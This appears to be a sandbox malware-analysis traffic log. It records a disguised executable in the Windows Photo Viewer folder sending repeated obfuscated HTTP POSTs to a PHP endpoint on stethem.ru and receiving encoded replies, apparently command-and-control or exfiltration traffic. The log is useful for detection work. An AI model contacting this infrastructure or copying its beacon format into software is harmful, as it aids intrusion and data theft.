Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:15.396370888 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue
Dec 28, 2024 22:19:15.750674963 CET	1072	OUT	Data Raw: 5f 59 58 52 5b 45 54 50 5c 57 57 56 5a 55 54 56 55 5b 59 5a 55 51 57 52 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: _YXR[ETP\WWVZUTVU[YZUQWRZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:* ,_?>5%(X&4<4:(,['# 11&>D$]/<![",\-
Dec 28, 2024 22:19:16.541701078 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:16.784989119 CET	794	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hJVlfDKobvfEnlys4SGi3F6xyILOsBhT9N%2FXEIvnTdCeookSL96n58poMlOoaCVdDgr9ar23Ue%2B0rYdHa2f05Xg33hH8b%2BW2tx5CsxdF2n7kjIxsj9XxDSUxQYIA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94966f6ac742ab-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13670&min_rtt=9369&rtt_var=12117&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1371&delivery_rate=33345&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49793	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:16.840837002 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1788 Expect: 100-continue
Dec 28, 2024 22:19:17.188321114 CET	1788	OUT	Data Raw: 5f 5b 58 55 5e 48 51 52 5c 57 57 56 5a 5e 54 53 55 5a 59 5e 55 55 57 5e 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: _[XU^HQR\WWVZ^TSUZY^UUW^ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:>3_<-%Y1?0#49?]/9\38R605$&%3;5Y/![",\-.
Dec 28, 2024 22:19:17.928141117 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:18.178066969 CET	941	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1sZ46o5IXnIezkyMfK1UmZi0r7Cms5Q1YaRG%2BO8rTvDrwTD%2FmMieZegInQSTFZcJGscBJJwjQXuROJJcnFfjPWO0ouHLQU4Tg3YYL6uSHt36iPVVJAf%2FntgkNtBD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f949678183542d0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4539&min_rtt=2813&rtt_var=4508&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2087&delivery_rate=87814&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0c 13 22 56 34 1b 21 09 35 33 2d 1e 30 17 00 52 2b 19 24 03 28 0e 26 02 24 29 34 56 3e 1d 20 50 33 29 2e 5a 33 2e 00 57 24 3f 2d 03 24 39 28 51 06 12 21 45 22 2f 0d 55 39 04 23 15 25 20 04 42 36 2e 35 5d 33 17 07 54 25 5e 21 5d 36 07 3c 0e 3b 5c 29 52 3e 07 34 41 2b 22 36 12 23 2b 2e 57 02 13 27 52 29 3e 38 08 20 31 3b 13 27 5e 2f 5d 22 2f 2e 0d 30 17 25 0d 22 2d 27 5e 3e 02 2c 15 34 37 33 10 2a 39 0a 06 20 2b 20 50 28 03 22 55 2d 0e 2e 56 0f 35 56 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98"V4!53-0R+$(&$)4V> P3).Z3.W$?-$9(Q!E"/U9#% B6.5]3T%^!]6<;\)R>4A+"6#+.W'R)>8 1;'^/]"/.0%"-'^>,473*9 + P("U-.V5VT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49794	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:17.033723116 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue
Dec 28, 2024 22:19:17.425121069 CET	1072	OUT	Data Raw: 5a 5e 58 57 5b 44 51 52 5c 57 57 56 5a 55 54 55 55 5b 59 59 55 51 57 53 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: Z^XW[DQR\WWVZUTUU[YYUQWSZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:=X+>"&8_03#_#/'[$Q"$%C%8/<![",\-
Dec 28, 2024 22:19:18.213720083 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:18.466440916 CET	790	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d6kbl0e7vK4dw%2Fa9DiKSMGWLCs5vdN4Q78t6SXXRS40QOYOebIsHMYCbBeth8c3R3loFY3WRmv2gr9CLECpPH1QNFgilLAATp2wksXKQe%2F3tbZ7zRniQ9rUItv9c"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f949679dc1c8c45-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4428&min_rtt=2013&rtt_var=5586&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1371&delivery_rate=68416&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49800	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:18.715071917 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue
Dec 28, 2024 22:19:19.063122034 CET	1072	OUT	Data Raw: 5a 52 5d 57 5b 44 51 57 5c 57 57 56 5a 54 54 55 55 56 59 5c 55 54 57 59 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: ZR]W[DQW\WWVZTTUUVY\UTWYZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:*#^<-%[%;3$/# ,9 Z3>## 2_1&90=Y/,![",\-
Dec 28, 2024 22:19:19.799546957 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:20.031882048 CET	790	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kTbFBcsSUttJfP7tiFE2tZ4afh50MINRaCNLKRU7lJmPJYQaBHmRU8fEfzAjcfp5U1k87WmhvfpyjEkOUc%2FFEENIJoaoG9CkGPMcir1zGnKfJWj8zsaCAM1%2F6m2E"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f949683cd9f4204-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4002&min_rtt=1747&rtt_var=5166&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1371&delivery_rate=73770&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49806	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:20.273605108 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:19:20.761765957 CET	1072	OUT	Data Raw: 5a 5f 58 51 5e 44 54 57 5c 57 57 56 5a 55 54 55 55 51 59 5d 55 52 57 58 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: Z_XQ^DTW\WWVZUTUUQY]URWXZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:+ 0+X%% $44":#\,)$3><!5%!386;![",\-
Dec 28, 2024 22:19:21.358395100 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:21.602377892 CET	790	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4T0EQlFUAMtL3GpKPvRnBZ8vltzqOikW5tCFta2zY7XR8GBaB2gie5m1b5ed1VkN%2BjMNXF6TPjsPRg00NjPhHhW48c5hSnEyrr8bbKSTHrGR0aqFKnYTj2SsjQ%2F0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94968d8ce51a13-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4641&min_rtt=1914&rtt_var=6172&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1395&delivery_rate=61517&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49807	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:21.902772903 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:19:22.252608061 CET	1072	OUT	Data Raw: 5f 5b 58 52 5e 41 54 55 5c 57 57 56 5a 59 54 57 55 51 59 5d 55 52 57 5f 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: _[XR^ATU\WWVZYTWUQY]URW_ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9'<>1+'0#+_8 0"62>D$(;<![",\-2
Dec 28, 2024 22:19:23.033169985 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:23.277010918 CET	792	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KXaXbjDxGntuBUDdn8zgUNwahM3uH4tJegJyf0ubp1XJZNVZ3Ta4BTVGlgnBFGHYg9oVtz8WpqPYmrcA2itEGkH6E%2Blx7%2Fh44bS%2FzmzV57O6rdKoYshasMY12RmX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f949697f83cc339-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4031&min_rtt=1664&rtt_var=5359&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1395&delivery_rate=70856&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49813	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:23.325540066 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1788 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:19:24.019669056 CET	1788	OUT	Data Raw: 5f 5b 58 50 5e 43 51 52 5c 57 57 56 5a 5f 54 56 55 56 59 5d 55 55 57 53 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: _[XP^CQR\WWVZ_TVUVY]UUWSZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9X> 0X=>]'?#&'3"9#X;8Y3 W6#"_&5!'(&;![",\-*
Dec 28, 2024 22:19:24.507338047 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:24.778511047 CET	944	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AOyqFipVXQErl0lrBK8WK7bmuL3Y7d7DoKnff2SBYk6s34uubdH71PFdehyh2fliQK%2BgrQ2B0mgUwohs%2BeMGCEdx0l6tt9OgRYx0ZAd%2FG6Y5SDyOqQhHTvSZdQ%2BM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9496a12b3fb9c5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=6736&min_rtt=1943&rtt_var=10315&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2111&delivery_rate=36237&cwnd=140&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0c 13 22 54 37 1c 2e 57 21 1d 0f 1f 30 07 36 14 3f 37 0e 04 3f 33 32 03 26 39 3f 0b 2a 33 09 0d 30 00 36 5f 33 00 0b 09 30 3c 2a 5b 24 29 28 51 06 12 21 42 21 3f 3f 1d 2e 03 28 00 27 20 3e 45 21 2d 13 59 33 5f 2d 1b 31 01 3d 10 22 39 09 56 2f 2a 2e 0f 3e 5f 3c 42 2a 31 2e 5e 21 2b 2e 57 02 13 27 1b 2b 3e 20 0c 35 08 2b 11 24 06 06 06 21 11 2e 0a 27 17 0c 57 37 03 3b 59 29 2f 33 00 34 19 20 0b 29 39 06 02 34 38 3b 0d 2b 29 22 55 2d 0e 2e 56 0f 35 56 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98"T7.W!06?7?32&9?306_30<[$)(Q!B!??.(' >E!-Y3_-1="9V/.>_<B1.^!+.W'+> 5+$!.'W7;Y)/34 )948;+)"U-.V5VT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49814	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:23.452454090 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:19:24.141710043 CET	1072	OUT	Data Raw: 5f 58 5d 50 5b 42 54 5c 5c 57 57 56 5a 5b 54 56 55 5a 59 50 55 54 57 59 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: _X]P[BT\\WWVZ[TVUZYPUTWYZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9_+#/(.5Y1$'?[ 9$.*<Z0Q":]&>B0(&8<![",\-:
Dec 28, 2024 22:19:24.622615099 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:24.874237061 CET	800	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e5ILW9Z6k4aWVz%2FKl8YWXOzr12t9YDQS%2Fy0wxsWVQAx4Oaj2eufiJTqUsDNJFoU%2BTm%2Bo01kQ%2B628BnltDgvY%2BByrOIhEz09PjNT%2FxHkZEP7uhe86PvaxEGN9OeG5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9496a1da9c8c87-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4089&min_rtt=1995&rtt_var=4936&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1395&delivery_rate=77874&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49820	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:25.117253065 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue
Dec 28, 2024 22:19:25.471524954 CET	1072	OUT	Data Raw: 5a 59 5d 50 5e 46 54 57 5c 57 57 56 5a 54 54 55 55 52 59 5f 55 56 57 5f 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: ZY]P^FTW\WWVZTTUURY_UVW_ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:*7?)X%<434?_ _<,90&-$5%2&&');![",\-
Dec 28, 2024 22:19:26.249558926 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:26.493418932 CET	786	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IrGFj4UpeB0GBALRvvzgt8S3OukLTluEUGRdkdSqWH0otGAwqBN3%2BvwPG2XGowyR4wOfUaRvKo74GmOX%2Bo8CFdIPH4UBduP3PQ1a8RN4L1F%2Fgd2zvtRB81EqLmr4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9496ac192d0f43-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4345&min_rtt=1693&rtt_var=5940&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1371&delivery_rate=63713&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a Data Ascii: 4>[[X
Dec 28, 2024 22:19:26.694391012 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49826	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:27.167586088 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:19:27.516263008 CET	1072	OUT	Data Raw: 5a 52 58 5d 5b 47 54 5c 5c 57 57 56 5a 5c 54 5a 55 51 59 5b 55 5c 57 52 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: ZRX][GT\\WWVZ\TZUQY[U\WRZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X93(_=="%[34\408<0=$R# -&C>%(8,![",\-&
Dec 28, 2024 22:19:28.170129061 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:28.403940916 CET	794	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nwnd0A5PUGwysx9jHLntOIUjkuJeyn%2BfQ6d6Wfc3kEtbCmHBgKx7OJheuTJu%2BwskRFFu5E1C3UGf9hczo2xHimraQTKGiJVWj%2FtqQ9FmRFxVkpJxFNT941nqJsvN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9496b8191c4232-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=10846&min_rtt=2155&rtt_var=18191&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1395&delivery_rate=20365&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

